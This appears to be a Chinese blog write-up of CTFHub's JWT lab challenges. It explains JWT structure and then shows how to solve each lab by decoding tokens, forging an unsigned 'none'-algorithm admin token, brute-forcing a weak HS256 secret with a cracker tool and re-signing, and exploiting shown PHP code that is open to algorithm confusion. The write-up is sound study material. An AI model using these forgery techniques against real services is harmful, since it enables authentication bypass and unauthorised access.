CTFHub-Web进阶-JWT练习

最新推荐文章于 2024-06-13 18:53:47 发布
最新推荐文章于 2024-06-13 18:53:47 发布
阅读量2.9k 收藏 10
点赞数 4
分类专栏: WriteUp CTFHub CTF 文章标签: jwt 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46150940/article/details/113440680
版权
CTF 同时被 3 个专栏收录
39 篇文章 12 订阅
订阅专栏
WriteUp
15 篇文章 2 订阅
订阅专栏
CTFHub
8 篇文章 1 订阅
订阅专栏

JWT的含义

Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。

JWT的结构

JWT由三部分组成,它们之间用圆点.连接。这三部分分别是:

Header     -->头部
Payload    -->负载
Signature  -->签名

这三部分拼接在一起就组成了JWT

Header.Payload.Signature

在这里插入图片描述

例如:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

使用在线工具,进行JWT解密

在这里插入图片描述

Header(头部)
Header的参数为alg和typ

alg: ALGORITHM   即算法名称
typ: TOKEN TYPE  即token的类型

例如:

{
  "alg": "HS256",
  "typ": "JWT"
}

数据所包含的信息为:token的类型是JWT,算法名称为HS256

Payload(有效载荷)

Payload用来存放实际需要传递的数据。

数据包含三个部分

1.Registered claims (标准中注册的声明) 
JWT 规定了7个官方字段,这些是一组预定义的claims,非强制性的,供选用。
iss (issuer):签发人
exp (expiration time):过期时间
sub (subject):主题
aud (audience):受众
nbf (Not Before):生效时间
iat (Issued At):签发时间
jti (JWT ID):编号

2.Public claims (公共的声明)
可以随意定义。自定义claims,注意不要和JWT注册表中属性冲突,这里可以查看JWT注册表。

3.Private claims (私有的声明)
这些是自定义的claims,用于在同意使用这些claims的各方之间共享信息,它们既不是Registered claims,也不是Public claims。

例如:

{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1516239022
}

数据中所包含的信息为:主题为1234567890,自定义的私有字段名字为John Do,签发时间为1516239022

Signature(签名)

Signature对前两部分的签名,防止数据篡改
将上面的HeaderPayloadbase64编码后的字符串用.连接在一起
提供一个密钥(secret)用Header中所规定的算法加密,就可以形成一个新的字符串。

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  your-256-bit-secret
)

将上面的三部分base64编码后,用 .拼接在一起,就形成了一个完整的JWT格式

JWT的特点

1.JWT 默认是不加密,但也是可以加密的。
2JWT 不加密的情况下,不能将秘密数据写入 JWT。
3.JWT 不仅可以用于认证,也可以用于交换信息。有效使用 JWT,可以降低服务器查询数据库的次数。
4.JWT 签发了,在到期之前就会始终有效,因为服务器不保存 session 状态,因此无法在使用过程中废止某个 token,或更改 token 的权限。
5.JWT 本身包含了认证信息,一旦泄露,任何人都可以获得该令牌的所有权限。
6.JWT 不应该使用 HTTP 协议明码传输,要使用 HTTPS 协议传输。

CTFHub-Web-JWT

敏感信息泄露

题目描述:JWT的头部和有效载荷这两部分的数据是以明文形式传输的,如果其中包含了敏感信息的话,就会发生敏感信息泄露。试着找出FLAG。格式为 flag{}

访问题目地址
在这里插入图片描述
尝试管理员账号登陆成功,但是没有flag
在这里插入图片描述

抓包一下,在Cookie里面发现了
在这里插入图片描述

token的值为

eyJBRyI6Ijg3ZWQ4ZjBjNmY3ZGNkNX0iLCJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJGTCI6ImN0Zmh1YntiYmI0MDQxMmUifQ.raHL5NAWYrXTeVHp9ptaU1gVh0k55ZW0TjkxwthfrDc

jwt解密,在JWT的HEADER和PAYLOAD部分可以得到flag

在这里插入图片描述

无签名

题目描述: 一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证。尝试找到 flag。

访问靶机地址
在这里插入图片描述
管理员弱密码登陆
在这里插入图片描述
抓包,在Cookie处发现JWT信息

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJyb2xlIjoiZ3Vlc3QifQ.MaphZVk25q4stXxAmEgXmKCW7aUo3jDJtgv9DwahLwc

在这里插入图片描述

JWT解密
在这里插入图片描述
将Header里面的alg置为空,即使用none算法
在这里插入图片描述
Payload里面的guest改为admin
在这里插入图片描述
由于使用无签名算法,所以Signature为空。然后使用.将Header、Payload和Signature拼接起来,得到新的JWT。

token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJyb2xlIjoiYWRtaW4ifQ==.

得到flag
在这里插入图片描述

弱密钥

题目描述:如果JWT采用对称加密算法,并且密钥的强度较弱的话,攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag

抓包
在这里插入图片描述
token为

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJyb2xlIjoiZ3Vlc3QifQ.0cny5aIZ4dDg7zcdMYCwzRPst82Z-bl5w-7bEH_dlC4

Base64解码

{"typ":"JWT","alg":"HS256"}{"username":"admin","password":"123456","role":"guest"}	YT%қ㹐d?Қ|~^2k
N3$

密钥不知道,使用JWT cracker工具爆破密钥,爆破得到密钥是cgpo

┌──(kali㉿kali)-[~/c-jwt-cracker]
└─$ make        
gcc -I /usr/include/openssl -g -std=gnu99 -O3   -c -o main.o main.c
gcc -I /usr/include/openssl -g -std=gnu99 -O3   -c -o base64.o base64.c
gcc -o jwtcrack main.o base64.o -lssl -lcrypto -lpthread
                                                                                                                                                                         
                                                                                                                                                                       
┌──(kali㉿kali)-[~/c-jwt-cracker]
└─$ ./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJyb2xlIjoiZ3Vlc3QifQ.0cny5aIZ4dDg7zcdMYCwzRPst82Z-bl5w-7bEH_dlC4
Secret is "cgpo"

把密钥cgpo填进去,然后把role:guest改成role:admin。
在这里插入图片描述
新生成的jwt

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJyb2xlIjoiYWRtaW4ifQ.G9FbZliNHqIX0wWyMh721jIbOIntXLydQCbLyebt32w

使用该jwt访问首页得到flag
在这里插入图片描述

修改签名算法*

题目描述:有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。

源码

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <title>CTFHub JWTDemo</title>
        <link rel="stylesheet" href="/static/style.css" />
    </head>
    <body>
        <main id="content">
            <header>Web Login</header>
            <form id="login-form" method="POST">
                <input type="text" name="username" placeholder="Username" />
                <input type="password" name="password" placeholder="Password" />
                <input type="submit" name="action" value="Login" />
            </form>
            <a href="/publickey.pem">publickey.pem</a>
        </main>
        <?php echo $_COOKIE['token'];?>
        <hr/>
    </body>
</html>

<?php
require __DIR__ . '/vendor/autoload.php';
use \Firebase\JWT\JWT;

class JWTHelper {
  public static function encode($payload=array(), $key='', $alg='HS256') {
    return JWT::encode($payload, $key, $alg);
  }
  public static function decode($token, $key, $alg='HS256') {
    try{
            $header = JWTHelper::getHeader($token);
            $algs = array_merge(array($header->alg, $alg));
      return JWT::decode($token, $key, $algs);
    } catch(Exception $e){
      return false;
    }
    }
    public static function getHeader($jwt) {
        $tks = explode('.', $jwt);
        list($headb64, $bodyb64, $cryptob64) = $tks;
        $header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));
        return $header;
    }
}

$FLAG = getenv("FLAG");
$PRIVATE_KEY = file_get_contents("/privatekey.pem");
$PUBLIC_KEY = file_get_contents("./publickey.pem");

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!empty($_POST['username']) && !empty($_POST['password'])) {
        $token = "";
        if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){
            $jwt_payload = array(
                'username' => $_POST['username'],
                'role'=> 'admin',
            );
            $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
        } else {
            $jwt_payload = array(
                'username' => $_POST['username'],
                'role'=> 'guest',
            );
            $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
        }
        @setcookie("token", $token, time()+1800);
        header("Location: /index.php");
        exit();
    } else {
        @setcookie("token", "");
        header("Location: /index.php");
        exit();
    }
} else {
    if(!empty($_COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {
        $obj = JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY);
        if ($obj->role === 'admin') {
            echo $FLAG;
        }
    } else {
        show_source(__FILE__);
    }
}
?>

publickey.pem

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuR4Ux+xr+5aFBfkU6sr3
KHChl9/R69s2bIjSHiZFtkWIwUpf9dQ5hTRICibphgehg8958xaGhuJA+5cMLEy9
LCR+0twWcSg7fPBe/Gbbo958MMjQbCPDBQOvOeeKYw++isq1r6AM1K0w+P69Yk33
Rd5iAux5mYp1cu550W3iiA5L+gsBr5iGeSnVBYoE0NETygExSh9tn1YEjK7+Si4L
GWlhspuQ1c3ZCFiiFyf4vyZjVS2YJa1awaabzQUU/l8qoaD4vacc8gO9HURSMPy6
QK6tR8Wn7S9FE+NfzDuj/W/2bZqJfg6C3+m27cmNt7TUka//eGcwbVTCKzSkvNDz
UQIDAQAB
-----END PUBLIC KEY-----


参考文章:JWT基础知识

Atkxor
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
BugkuCTF-WEB进阶
Alita_lxz的博客
11-10 361
BugkuCTF-WEB进阶-第1题到第11题
lua-resty-jwtJWT为伟大的Openresty
02-03
标题"lua-resty-jwtJWT为伟大的Openresty"表明了本文将探讨如何使用lua-resty-jwt库在Openresty(一个基于Nginx和Lua的高性能Web平台)中处理JSON Web Tokens (JWT)。JWT是一种安全的身份验证和授权机制,常用于...
ctfhub 技能树 JSON Web Token 修改签名算法
m0_62879498的博客
04-01 1880
ctfhub 技能树 JSON Web Token 修改签名算法 有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。 一进入页面,我们发现 页面源码: <?php require __DIR__ . '/vendor/autoload.php'; use \Firebase\JWT\JWT; class JWTHelper { public static fu
JWT的加密解密
最新发布
weixin_53520295的博客
06-13 1991
JWT的加密解密
ctf-hub web进阶(JWT)
h0ld1rs的博客
10-19 1765
敏感信息泄露 http://jwt.io 使用这个网站,把token进行加载即可 然后两部分拼接即可 无签名 none时侯,一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证 import jwt token = jwt.encode( { "username": "admin", "password": "admin", "role":"admin" }, algorithm="none",key="" ) print(token) 最后可以得到 e
CTFHUB JWT(Json Web Token)
weixin_63231007的博客
11-04 2063
然后看到decode函数这里它本质上使用的还是JWT上的编码的方法,使用的的KEY值是PUBLIC_KEY,也就是题目给出的提示公钥,发现在 JWTHelper类中,decode()、encode()默认的加密解密方式都为“HS256”根据这个条件我们需要编写一个python代码来生成token。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2271
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
CTFHUB--WEB进阶
qq_49422880的博客
12-17 1313
WEB进阶前言LD_PRELOADShellShock 前言   大部分都是知识盲区,可能不会写的很好,大家凑合着看。 LD_PRELOAD   这个题目一开始就不是特别的懂,看了一些writeup之后才渐渐明白这题目所考察的知识点,下面就来讲讲吧。题目开始就提示我们要用LD_PRELOAD,这个是什么东西呢? <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function ——
cpp-jwt:C ++的JSON Web令牌库
02-05
JSON Web Token(JWT)是一种开放标准(RFC 7519),用于在各方之间安全地传输信息作为JSON对象。这个信息可以被验证和信任,因为它是数字签名的。cpp-jwt是一个C++库,专门设计用于创建和解析JWT。在这个库的帮助下...
Node-Authentication-With-JWT:可使用jwt(JSON Web令牌)处理身份验证的Nodejs api
02-13
可以使用JWT处理身份验证的NodeJs API。 技术栈: -> bcryptjs [对密码进行哈希处理] ->快递 -> joi [模式验证] -> JWT ->猫鼬 JSON Web令牌: JSON Web令牌是用于创建具有可选签名和/或可选加密的数据的互联网标准...
grpc-jwt-spring-boot-starter:具有JWT授权的gRPC框架的Spring Boot Starter
03-28
具有Spring Boot Starter-gRPC Java JWT ... < artifactId>grpc-jwt-spring-boot-starter ${version} 2.在服务方法中添加@Allow批注 您需要做的就是在服务实现中注释您的方法。 @GRpcService public clas
spring-boot-mongodb-jwt:具有MongoDB和JWT身份验证的Spring Boot项目的基础
02-04
Spring-Boot-MongoDB-JWT 用于具有MongoDB和基于JWT安全性的项目的Spring Boot基础。 这是具有Spring Boot,MongoDB和已配置JWT安全性的Java项目的快速入门基础。 跑步 下载此基础 在系统中启动MongoDB服务/守护...
CTFHUB web进阶学习
Je3Z的博客
09-12 1313
CTFHubweb进阶学习 Linux 动态加载器 ctfhub 动态加载器 linux–>ldd命令的介绍 就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2 这里我们直接ldd /readflag 列出所需要得动态链接库 然后再/lib64/ld-linux-x86-64.so.2 /readflag 即可获取flag php Bypass disable_function LD_PRELOAD Linu
CTF-Web jwt
Makabakahaha的博客
10-04 261
web做题记录
JWT学习(ctfshow web入门jwt
qq_45766062的博客
11-20 1281
jwt介绍 ctfshow web入门jwt web345 工具:burp suite,jwt在线解码工具链接 分析:首先看到提示/admin 访问抓包,看到auth,实际上就是jwt: 然后,用在线工具解码:
Json web token (JWT)渗透与防御及ctf例题
weixin_65582330的博客
03-06 1132
可以看到我们登录进去后,用f12检测可以发现他有着jwt形式的token,这里也可以用bp进行抓包,下面用kali中的jwt_tool工具进行破解,可以看到flag。算法为none是因为开发人员为了更方便的修改,把header部分设置为none,从而不用进行第三部分签名的认证。从题目中可以知道必须要成为admin才可以得到flag,而我们是guest,所以我们可以试试把签名设置为空。还有一道类似的题,需要用到爆破工具,可以抓到包,看到jwt数据,拿到kali中进行jwt工具的扫描。
ctfshow JWT 专题
会下雪的晴天
01-02 578
title: ctfshow JWT 专题 date: 2020-12-29 15:31:47 categories: ctfshow csdn随缘更新了 JWT(json web token)跨域认证解决方案,入门教程 web345 web346 web347 web348 web345 没加密,直接伪造,推荐网站:https://jwt.io/ web346 有加密,不能爆破,改算法为none,sub为admin即可 web347 弱口令,盲猜:123456 web348 C语言爆破工具 .
ctfshow——JWT
qq_55202378的博客
05-01 994
抓个包,可以看到cookie部分使用JWT(Json Web Token)。 先用base64将JWT进行解密,修改为admin,再用base64进行加密。再访问 这里使用了HS256加密方式,方法:alg字段改为,sub改为,对每一段分别用base64进行加密,然后用拼接起来,注意最后一个点不能少。都可以用jwt-cracker进行爆破,获取密匙。或者用脚本跑。 web 349——非对称加密算法RS256私钥泄漏 根据提示,大致意思就是访问,服务器会使用RS256算法私钥加密一段字符串作为cookie
ctfshow web入门 JWT
Anton1a的博客
02-24 4307
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atkxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值